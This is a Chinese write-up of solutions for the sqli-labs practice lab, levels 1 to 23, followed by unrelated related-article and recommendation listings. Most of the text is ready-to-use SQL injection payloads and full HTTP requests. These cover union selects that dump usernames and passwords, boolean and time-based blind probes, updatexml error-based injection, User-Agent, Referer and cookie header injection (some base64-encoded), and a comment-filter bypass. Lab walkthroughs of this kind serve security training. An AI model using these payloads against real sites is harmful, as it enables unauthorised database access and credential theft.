Less-1

  payload:'+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+

  第一关正规的字符型SQL注入,单引号报错,常规注入即可

Less-2

   payload:+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+

  第二关数字型SQL注入,直接跟payload即可,通过and 1=1 ,and 1=2发现注入点

Less-3

  payload:')+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+

  第三关为小括号包裹的字符型注入,发现注入点之后使用payload即可

Less-4

  payload:")+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+

  第四关为小括号包裹的字符型注入

Less-5

  payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+

  payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+

  布尔盲注脚本:https://www.cnblogs.com/Spec/p/10648793.html

  此脚本只将数据库爆出,具体还需要自己更改。

Less-6

  payload1(探测长度,以database()为例):"+and+(select+length(database())=8)--+

  payload2(探测内容,以database()为例):"+and+(select+mid(database(),1,1)='s')--+

  同第五关,脚本稍作更改也可使用

Less-7

  payload1(探测长度,以database()为例):'))+and+if((length(database())=8),sleep(3),1)--+

  payload2(探测内容,以database()为例):'))+and+if((mid(database(),1,1)='s'),sleep(3),1)--+

  时间盲注,通过if语句判断,争取则延时3秒,否则不延时。

Less-8

  payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+

  payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+

  同第五关

Less-9

  payload1(探测长度,以database()为例):'+and+if((length(database())=8),sleep(3),1)--+

  payload2(探测内容,以database()为例):'+and+if((mid(database(),1,1)='s'),sleep(3),1)--+

  同第七关,单引号字符型延时盲注

Less-10

  payload1(探测长度,以database()为例):"+and+if((length(database())=8),sleep(3),1)--+

  payload2(探测内容,以database()为例):"+and+if((mid(database(),1,1)='s'),sleep(3),1)--+

Less-11

  payload:

POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79 uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit

  常规的post注入,万能密码等。

Less-12

  payload:

POST /sqli-labs/Less-12/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-12/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 110 uname=admin&passwd=123") and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit

Less-13

  poc:

POST /sqli-labs/Less-13/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-13/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74 uname=admin&passwd=123') or (select length(database())=8)-- &submit=Submit

  post类型的布尔盲注,密码处通过 or 来判断真假

Less-14

  poc:

POST /sqli-labs/Less-14/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-14/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67 uname=1&passwd=1" or (select length(database())=8)-- &submit=Submit

  同第十三关

Less-15

  payload:

POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79 uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit

Less-16

  poc:

POST /sqli-labs/Less-16/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-16/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74 uname=admin&passwd=123") or (select length(database())=8)-- &submit=Submit

Less-17

  poc:

POST /sqli-labs/Less-17/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-17/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 100 uname=secure&passwd=admin' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- &submit=Submit

  报错注入,之前一直用这个payload:

select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a

  但一直都不对,知道读源码才知道对长度进行了限制,所以使用这个payload:

updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

  发现报错成功。

Less-18

  poc:

POST /sqli-labs/Less-18/ HTTP/1.1
Host: localhost
User-Agent: ' or updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) or '
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-18/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34 uname=admin&passwd=0&submit=Submit

  看源码发现,是将User-Agent未过滤插入数据库中,此时构造报错注入:updatexml(1,concat(0x7e,(SELECT user()),0x7e),1),从而产生sql  http头注入。

Less-19

  poc:

POST /sqli-labs/Less-19/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: ' or updatexml(1,concat(0x7e,(select user()),0x7e),1) or '
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34 uname=admin&passwd=0&submit=Submit

  同第十八关一样,不过登录进去时发现会将referer输出,于是修改referer的值,报错成功。

Less-20

  poc:

GET /sqli-labs/Less-20/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=admin' and 1=2 union select user(),version(),database()--+
Connection: close

  cookie注入,当登录进去时,发现会将User-Anget,referer,cookie输出到页面中,然后刷新,抓包,替换cookie为payload即可。

Less-21

  poc:

GET /sqli-labs/Less-21/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxIw==
Connection: close

  payload使用base64编码,并且注入点使用单引号和小括号包裹 ')

  payload: admin') and 1=2 union select 1,username,password from security.users limit 0,1#

Less-22

  poc:

GET /sqli-labs/Less-22/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IDEsdXNlcm5hbWUscGFzc3dvcmQgZnJvbSBzZWN1cml0eS51c2VycyBsaW1pdCAwLDEtLSA=
Connection: close

  payload:admin" and 1=2 union select 1,username,password from security.users limit 0,1--

Less-23

  payload: ' and '1'='2' union select '1',username,password from security.users limit 0,1;%00

  多次尝试基本确定 # 与 -- 是被过滤掉了的,于是尝试新的注释方法: ;%00 于是注释成功。

sqli-labs Less-1~~~Less-23的更多相关文章

  1. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  2. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  3. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  4. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  5. SQL注入系列:SQLi Labs

    前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...

  6. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  7. SQLI LABS Challenges Part(54-65) WriteUp

    终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...

  8. SQLI LABS Stacked Part(38-53) WriteUp

    这里是堆叠注入部分 less-38: 这题啥过滤都没有,直接上: ?id=100' union select 1,2,'3 less-39: 同less-38: ?id=100 union selec ...

  9. SQLI LABS Advanced Part(23-37) WriteUp

    继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...

  10. Sqli labs系列-less-5&6 报错注入法(下)

    我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...

随机推荐

  1. 1、Go语言介绍

    一 Go语言介绍 Go 即Golang,是Google公司2009年11月正式对外公开的一门编程语言. Go是静态强类型语言,是区别于解析型语言的编译型语言. 解析型语言--源代码是先翻译为中间代码, ...

  2. 放进你的收藏夹吃灰!Linux 运维必备的 40 个命令总结

    1.删除0字节文件 find -type f -size 0 -exec rm -rf {} ; 2.查看进程 按内存从大到小排列 PS -e -o "%C : %p : %z : %a&q ...

  3. C++分支结构,求一元二次方程的根

    总时间限制:  1000ms 内存限制:  65536kB 描述 利用公式x1 = (-b + sqrt(b*b-4*a*c))/(2*a), x2 = (-b - sqrt(b*b-4*a*c))/ ...

  4. 阿里云云开发平台助力风变科技Serverless架构升级实战

    阿里云云开发平台助力风变科技Serverless架构升级实战 背景 风变科技 一个希望通过技术去推动下一代基础教育的组织.旗下产品包括第一代的熊猫书院(读书类产品).第二代的熊猫小课(泛学科综合学习平 ...

  5. FlashCache初体验

    注意: 测试用的是CentOS6.5 内核版本2.6.32-431.el6.x86_64 步骤: 上传CentOS6.5做本地yum源,安装以下包. yum install gcc yum insta ...

  6. Django连接redis

    CACHES = { "default": { "BACKEND": "django_redis.cache.RedisCache", &q ...

  7. Prometheus 使用之 node exporter

    本文使用的 Prometheus 版本为 2.22.0,node exporter 版本为 1.0.1:部署在 Linux 服务器Prometheus 是开源的监控报警系统和时序列数据库 (TSDB) ...

  8. NOIp2020游记

    Day 1 考点还是在南航,第三次去已经没有什么新鲜感了,满脑子都是NOIp能不能考好.考前奶了一波这次必考最短路,于是在试机的时候打了一遍Dij和SPFA的板子,信心满满的上场了. 考试右后方是Ki ...

  9. 本地eclipse java api连接远程虚拟机HBase

    1.本地与远程连通 无论是域名或者ip都可以,另外需保证HBase在虚拟机集群上正常运行. 2.本地要有一个跟远程相同的hadoop环境 当然不相同,只要兼容也可以,现采用hadoop-2.5.0-c ...

  10. Python特殊序列\d能匹配哪些数字?

    在缺省语言环境下,老猿对\d的匹配范围做了个测试,下面的数字包含半角数字.全角数字.中文数字,测试语句如下: >>> m=re.search(r'(\d*)(\D*)(\d*)',' ...